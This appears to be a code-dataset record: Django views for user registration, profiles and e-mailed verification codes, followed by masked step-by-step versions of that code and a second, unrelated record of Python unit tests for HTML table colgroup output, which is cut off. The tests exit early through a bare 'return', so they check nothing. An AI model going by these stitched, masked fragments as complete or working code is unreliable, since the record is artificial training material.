    E-mails a fresh verification code to the logged-in user (unless the
    address is already verified) and redirects back to their profile.
    """
    if request.user.get_profile().is_verified:
        messages.info(request, 'Olet jo vahvistanut osoitteesi')
    else:
        code_ctx = {'code': request.user.get_profile().gen_verification_code()}
        # Rendered from the send_verification_code.txt template.
        email_helpers.send_user_email(request.user, _('Verification code'),
            'send_verification_code.txt', code_ctx)
        messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')
    return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
<|reserved_special_token_1|>
# vim: tabstop=4 expandtab autoindent shiftwidth=4 fileencoding=utf-8
from django.contrib.auth.decorators import login_required
from django.contrib.auth import models as auth_models
from django.contrib.auth import forms as auth_forms
from django.contrib.auth import authenticate, login
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_noop as _
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, render_to_response
from django.template import RequestContext
from django_mises.blog import models as blog_models
from django_mises.users import forms as users_forms
from django_mises import email_helpers
def user_view(request, username):
    """View the user

    Shows the public profile for *username* (active accounts only).
    When the viewer is looking at their own, not-yet-verified account,
    an e-mail verification form is rendered and processed here too.
    """
    import datetime
    user = get_object_or_404(auth_models.User, username=username, is_active=True)
    now = datetime.datetime.now()
    # Count only posts whose publish time has already passed.
    post_count = blog_models.Post.objects.filter(author=user, publish_at__lte=now).count()
    # Needs verification?
    email_verification_form = None
    if request.user.id == user.id and not user.get_profile().is_verified:
        data = request.POST.copy() or None
        email_verification_form = users_forms.EmailVerificationForm(data=data)
        if email_verification_form.is_bound:
            # The form validates the submitted code against this user.
            email_verification_form.data['user'] = request.user
            if email_verification_form.is_valid():
                email_verification_form.save()
                messages.info(request, 'Tunnuksesi on aktivoitu!')
                return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
    # Avoid template namespace clash
    context = {
        'viewed_user': user,
        'post_count': post_count,
        'email_verification_form': email_verification_form,
    }
    req_ctx = RequestContext(request, context)
    return render_to_response('user.html', req_ctx)
def register(request):
    """Registration view, Django offers none

    Creates the account from a UserCreationForm, logs the new user in
    immediately, and redirects to their profile page.
    """
    data = request.POST.copy() or None
    user_creation_form = auth_forms.UserCreationForm(data)
    if user_creation_form.is_bound:
        if user_creation_form.is_valid():
            user = user_creation_form.save()
            # authenticate() must run before login() can start the session.
            user = authenticate(username=user.username, password=user_creation_form.cleaned_data['password1'])
            login(request, user)
            return HttpResponseRedirect(reverse('user', args=(user.username,)))
    context = {
        'user_creation_form': user_creation_form,
    }
    req_ctx = RequestContext(request, context)
    return render_to_response('register.html', req_ctx)
@login_required
def get_verification_code(request):
    """Maybe ajaxify this in the future

    Sends a new e-mail verification code to the logged-in user, unless
    their address is already verified, then redirects to their profile.
    """
    if request.user.get_profile().is_verified:
        messages.info(request, 'Olet jo vahvistanut osoitteesi')
    else:
        verification_code = request.user.get_profile().gen_verification_code()
        extractx = {
            'code': verification_code,
        }
        subject = _('Verification code')
        # Rendered from the send_verification_code.txt template with the code.
        email_helpers.send_user_email(request.user, subject, 'send_verification_code.txt', extractx)
        messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')
    return HttpResponseRedirect(reverse('user', args=(request.user.username,)))
# EOF
|
flexible
|
{
"blob_id": "22da05d9bf6139a0306bfb2d1df96e9e2cf6a0c6",
"index": 475,
"step-1": "<mask token>\n\n\n@login_required\ndef get_verification_code(request):\n \"\"\"Maybe ajaxify this in the future\n \"\"\"\n if request.user.get_profile().is_verified:\n messages.info(request, 'Olet jo vahvistanut osoitteesi')\n else:\n verification_code = request.user.get_profile().gen_verification_code()\n extractx = {'code': verification_code}\n subject = _('Verification code')\n email_helpers.send_user_email(request.user, subject,\n 'send_verification_code.txt', extractx)\n messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')\n return HttpResponseRedirect(reverse('user', args=(request.user.username,)))\n",
"step-2": "<mask token>\n\n\ndef register(request):\n \"\"\"Registration view, Django offers none\n \"\"\"\n data = request.POST.copy() or None\n user_creation_form = auth_forms.UserCreationForm(data)\n if user_creation_form.is_bound:\n if user_creation_form.is_valid():\n user = user_creation_form.save()\n user = authenticate(username=user.username, password=\n user_creation_form.cleaned_data['password1'])\n login(request, user)\n return HttpResponseRedirect(reverse('user', args=(user.username,)))\n context = {'user_creation_form': user_creation_form}\n req_ctx = RequestContext(request, context)\n return render_to_response('register.html', req_ctx)\n\n\n@login_required\ndef get_verification_code(request):\n \"\"\"Maybe ajaxify this in the future\n \"\"\"\n if request.user.get_profile().is_verified:\n messages.info(request, 'Olet jo vahvistanut osoitteesi')\n else:\n verification_code = request.user.get_profile().gen_verification_code()\n extractx = {'code': verification_code}\n subject = _('Verification code')\n email_helpers.send_user_email(request.user, subject,\n 'send_verification_code.txt', extractx)\n messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')\n return HttpResponseRedirect(reverse('user', args=(request.user.username,)))\n",
"step-3": "<mask token>\n\n\ndef user_view(request, username):\n \"\"\"View the user\n \"\"\"\n import datetime\n user = get_object_or_404(auth_models.User, username=username, is_active\n =True)\n now = datetime.datetime.now()\n post_count = blog_models.Post.objects.filter(author=user,\n publish_at__lte=now).count()\n email_verification_form = None\n if request.user.id == user.id and not user.get_profile().is_verified:\n data = request.POST.copy() or None\n email_verification_form = users_forms.EmailVerificationForm(data=data)\n if email_verification_form.is_bound:\n email_verification_form.data['user'] = request.user\n if email_verification_form.is_valid():\n email_verification_form.save()\n messages.info(request, 'Tunnuksesi on aktivoitu!')\n return HttpResponseRedirect(reverse('user', args=(request.\n user.username,)))\n context = {'viewed_user': user, 'post_count': post_count,\n 'email_verification_form': email_verification_form}\n req_ctx = RequestContext(request, context)\n return render_to_response('user.html', req_ctx)\n\n\ndef register(request):\n \"\"\"Registration view, Django offers none\n \"\"\"\n data = request.POST.copy() or None\n user_creation_form = auth_forms.UserCreationForm(data)\n if user_creation_form.is_bound:\n if user_creation_form.is_valid():\n user = user_creation_form.save()\n user = authenticate(username=user.username, password=\n user_creation_form.cleaned_data['password1'])\n login(request, user)\n return HttpResponseRedirect(reverse('user', args=(user.username,)))\n context = {'user_creation_form': user_creation_form}\n req_ctx = RequestContext(request, context)\n return render_to_response('register.html', req_ctx)\n\n\n@login_required\ndef get_verification_code(request):\n \"\"\"Maybe ajaxify this in the future\n \"\"\"\n if request.user.get_profile().is_verified:\n messages.info(request, 'Olet jo vahvistanut osoitteesi')\n else:\n verification_code = request.user.get_profile().gen_verification_code()\n extractx = {'code': 
verification_code}\n subject = _('Verification code')\n email_helpers.send_user_email(request.user, subject,\n 'send_verification_code.txt', extractx)\n messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')\n return HttpResponseRedirect(reverse('user', args=(request.user.username,)))\n",
"step-4": "from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import models as auth_models\nfrom django.contrib.auth import forms as auth_forms\nfrom django.contrib.auth import authenticate, login\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext_noop as _\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render_to_response\nfrom django.template import RequestContext\nfrom django_mises.blog import models as blog_models\nfrom django_mises.users import forms as users_forms\nfrom django_mises import email_helpers\n\n\ndef user_view(request, username):\n \"\"\"View the user\n \"\"\"\n import datetime\n user = get_object_or_404(auth_models.User, username=username, is_active\n =True)\n now = datetime.datetime.now()\n post_count = blog_models.Post.objects.filter(author=user,\n publish_at__lte=now).count()\n email_verification_form = None\n if request.user.id == user.id and not user.get_profile().is_verified:\n data = request.POST.copy() or None\n email_verification_form = users_forms.EmailVerificationForm(data=data)\n if email_verification_form.is_bound:\n email_verification_form.data['user'] = request.user\n if email_verification_form.is_valid():\n email_verification_form.save()\n messages.info(request, 'Tunnuksesi on aktivoitu!')\n return HttpResponseRedirect(reverse('user', args=(request.\n user.username,)))\n context = {'viewed_user': user, 'post_count': post_count,\n 'email_verification_form': email_verification_form}\n req_ctx = RequestContext(request, context)\n return render_to_response('user.html', req_ctx)\n\n\ndef register(request):\n \"\"\"Registration view, Django offers none\n \"\"\"\n data = request.POST.copy() or None\n user_creation_form = auth_forms.UserCreationForm(data)\n if user_creation_form.is_bound:\n if user_creation_form.is_valid():\n user = user_creation_form.save()\n user = 
authenticate(username=user.username, password=\n user_creation_form.cleaned_data['password1'])\n login(request, user)\n return HttpResponseRedirect(reverse('user', args=(user.username,)))\n context = {'user_creation_form': user_creation_form}\n req_ctx = RequestContext(request, context)\n return render_to_response('register.html', req_ctx)\n\n\n@login_required\ndef get_verification_code(request):\n \"\"\"Maybe ajaxify this in the future\n \"\"\"\n if request.user.get_profile().is_verified:\n messages.info(request, 'Olet jo vahvistanut osoitteesi')\n else:\n verification_code = request.user.get_profile().gen_verification_code()\n extractx = {'code': verification_code}\n subject = _('Verification code')\n email_helpers.send_user_email(request.user, subject,\n 'send_verification_code.txt', extractx)\n messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')\n return HttpResponseRedirect(reverse('user', args=(request.user.username,)))\n",
"step-5": "# vim: tabstop=4 expandtab autoindent shiftwidth=4 fileencoding=utf-8\n\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.contrib.auth import models as auth_models\nfrom django.contrib.auth import forms as auth_forms\nfrom django.contrib.auth import authenticate, login\n\nfrom django.core.urlresolvers import reverse\n\nfrom django.utils.translation import ugettext_noop as _\n\nfrom django.contrib import messages\n\nfrom django.http import HttpResponseRedirect\n\nfrom django.shortcuts import get_object_or_404, render_to_response\n\nfrom django.template import RequestContext\n\nfrom django_mises.blog import models as blog_models\n\nfrom django_mises.users import forms as users_forms\n\nfrom django_mises import email_helpers\n\ndef user_view(request, username):\n \"\"\"View the user\n \"\"\"\n\n import datetime\n\n user = get_object_or_404(auth_models.User, username=username, is_active=True)\n\n now = datetime.datetime.now()\n\n post_count = blog_models.Post.objects.filter(author=user, publish_at__lte=now).count()\n\n # Needs verification?\n email_verification_form = None\n if request.user.id == user.id and not user.get_profile().is_verified:\n data = request.POST.copy() or None\n\n email_verification_form = users_forms.EmailVerificationForm(data=data)\n if email_verification_form.is_bound:\n email_verification_form.data['user'] = request.user\n if email_verification_form.is_valid():\n email_verification_form.save()\n\n messages.info(request, 'Tunnuksesi on aktivoitu!')\n\n return HttpResponseRedirect(reverse('user', args=(request.user.username,)))\n\n # Avoid template namespace clash\n context = {\n 'viewed_user': user,\n 'post_count': post_count,\n 'email_verification_form': email_verification_form,\n }\n req_ctx = RequestContext(request, context)\n\n return render_to_response('user.html', req_ctx)\n\ndef register(request):\n \"\"\"Registration view, Django offers none\n \"\"\"\n\n data = request.POST.copy() or None\n\n 
user_creation_form = auth_forms.UserCreationForm(data)\n if user_creation_form.is_bound:\n if user_creation_form.is_valid():\n user = user_creation_form.save()\n\n user = authenticate(username=user.username, password=user_creation_form.cleaned_data['password1'])\n login(request, user)\n\n return HttpResponseRedirect(reverse('user', args=(user.username,)))\n\n context = {\n 'user_creation_form': user_creation_form,\n }\n req_ctx = RequestContext(request, context)\n\n return render_to_response('register.html', req_ctx)\n\n@login_required\ndef get_verification_code(request):\n \"\"\"Maybe ajaxify this in the future\n \"\"\"\n\n if request.user.get_profile().is_verified:\n messages.info(request, 'Olet jo vahvistanut osoitteesi')\n else:\n verification_code = request.user.get_profile().gen_verification_code()\n extractx = {\n 'code': verification_code,\n }\n subject = _('Verification code')\n email_helpers.send_user_email(request.user, subject, 'send_verification_code.txt', extractx)\n\n messages.info(request, 'Vahvistuskoodi on lähetetty sähköpostiisi')\n\n return HttpResponseRedirect(reverse('user', args=(request.user.username,)))\n\n# EOF\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class TestColGroup(unittest.TestCase):
<|reserved_special_token_0|>
def test_col(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': {}}), 'colgroup wraps col')
self.assertEqual(
'<table><colgroup span="3" width="100"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': [{}, {}, {}]}),
'colgroup wraps multiple cols')
self.assertEqual(
'<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None, 'col': {}}),
'colgroup can be overriden when col is present too')
gen = Table({'data': data, 'col': [{}, {}, {}]})
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': {}}),
'multiple cols against single colgroup')
self.assertEqual(
'<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),
'no cols against multiple colgroups')
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{}, {}, {}]}),
'multiple cols against multiple colgroups')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestColGroup(unittest.TestCase):
def test_colgroup(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate(), 'colgroup present from generate()')
self.assertEqual(
'<table><colgroup span="3" width="100" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'
, gen.generate({'tgroups': 2}),
'colgroup present from generate() with tgroups')
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None}), 'colgroup can be overriden')
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')
self.assertEqual(
'<table><colgroup color="red" span="1" /><colgroup color="blue" span="2" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {
'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')
def test_col(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': {}}), 'colgroup wraps col')
self.assertEqual(
'<table><colgroup span="3" width="100"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': [{}, {}, {}]}),
'colgroup wraps multiple cols')
self.assertEqual(
'<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None, 'col': {}}),
'colgroup can be overriden when col is present too')
gen = Table({'data': data, 'col': [{}, {}, {}]})
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': {}}),
'multiple cols against single colgroup')
self.assertEqual(
'<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),
'no cols against multiple colgroups')
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{}, {}, {}]}),
'multiple cols against multiple colgroups')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestColGroup(unittest.TestCase):
def test_colgroup(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate(), 'colgroup present from generate()')
self.assertEqual(
'<table><colgroup span="3" width="100" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'
, gen.generate({'tgroups': 2}),
'colgroup present from generate() with tgroups')
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None}), 'colgroup can be overriden')
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')
self.assertEqual(
'<table><colgroup color="red" span="1" /><colgroup color="blue" span="2" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {
'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')
def test_col(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': {}}), 'colgroup wraps col')
self.assertEqual(
'<table><colgroup span="3" width="100"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': [{}, {}, {}]}),
'colgroup wraps multiple cols')
self.assertEqual(
'<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None, 'col': {}}),
'colgroup can be overriden when col is present too')
gen = Table({'data': data, 'col': [{}, {}, {}]})
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': {}}),
'multiple cols against single colgroup')
self.assertEqual(
'<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),
'no cols against multiple colgroups')
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{}, {}, {}]}),
'multiple cols against multiple colgroups')
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import unittest
from Spreadsheet.HTML import Table
class TestColGroup(unittest.TestCase):
def test_colgroup(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate(), 'colgroup present from generate()')
self.assertEqual(
'<table><colgroup span="3" width="100" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'
, gen.generate({'tgroups': 2}),
'colgroup present from generate() with tgroups')
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None}), 'colgroup can be overriden')
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')
self.assertEqual(
'<table><colgroup color="red" span="1" /><colgroup color="blue" span="2" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {
'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')
def test_col(self):
return
data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]
gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},
'attr_sort': 1})
self.assertEqual(
'<table><colgroup span="3" width="100"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': {}}), 'colgroup wraps col')
self.assertEqual(
'<table><colgroup span="3" width="100"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': [{}, {}, {}]}),
'colgroup wraps multiple cols')
self.assertEqual(
'<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': None, 'col': {}}),
'colgroup can be overriden when col is present too')
gen = Table({'data': data, 'col': [{}, {}, {}]})
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': {}}),
'multiple cols against single colgroup')
self.assertEqual(
'<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),
'no cols against multiple colgroups')
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'
, gen.generate({'colgroup': [{}, {}, {}]}),
'multiple cols against multiple colgroups')
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import unittest
from Spreadsheet.HTML import Table
class TestColGroup(unittest.TestCase):
def test_colgroup(self):
return
data = [
['a','b','c'],
[1,2,3],
[4,5,6],
]
gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } )
self.assertEqual(
'<table><colgroup span="3" width="100" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate(),
"colgroup present from generate()"
)
self.assertEqual(
'<table><colgroup span="3" width="100" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>',
gen.generate( { 'tgroups': 2 } ),
"colgroup present from generate() with tgroups"
)
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': None } ),
"colgroup can be overriden"
)
self.assertEqual(
'<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': 1 } ),
"colgroup yields no-op if scalar"
)
self.assertEqual(
'<table><colgroup color="red" span="1" /><colgroup color="blue" span="2" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': [ { 'span': 1, 'color': 'red' }, { 'span': 2, 'color': 'blue' } ] } ),
"can specify multiple colgroups"
)
def test_col(self):
return
data = [
['a','b','c'],
[1,2,3],
[4,5,6],
]
gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } );
self.assertEqual(
'<table><colgroup span="3" width="100"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'col': {} } ),
"colgroup wraps col"
)
self.assertEqual(
'<table><colgroup span="3" width="100"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'col': [{},{},{}] } ),
"colgroup wraps multiple cols"
)
self.assertEqual(
'<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': None, 'col': {} } ),
"colgroup can be overriden when col is present too"
)
gen = Table( { 'data': data, 'col': [{},{},{}] } );
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': {} } ),
"multiple cols against single colgroup"
)
self.assertEqual(
'<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'col': None, 'colgroup': [{},{},{}] } ),
"no cols against multiple colgroups"
)
self.assertEqual(
'<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',
gen.generate( { 'colgroup': [{},{},{}] } ),
"multiple cols against multiple colgroups"
)
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "24f87bd6aab0ff65cf2153e27df31122818ad0ac",
"index": 766,
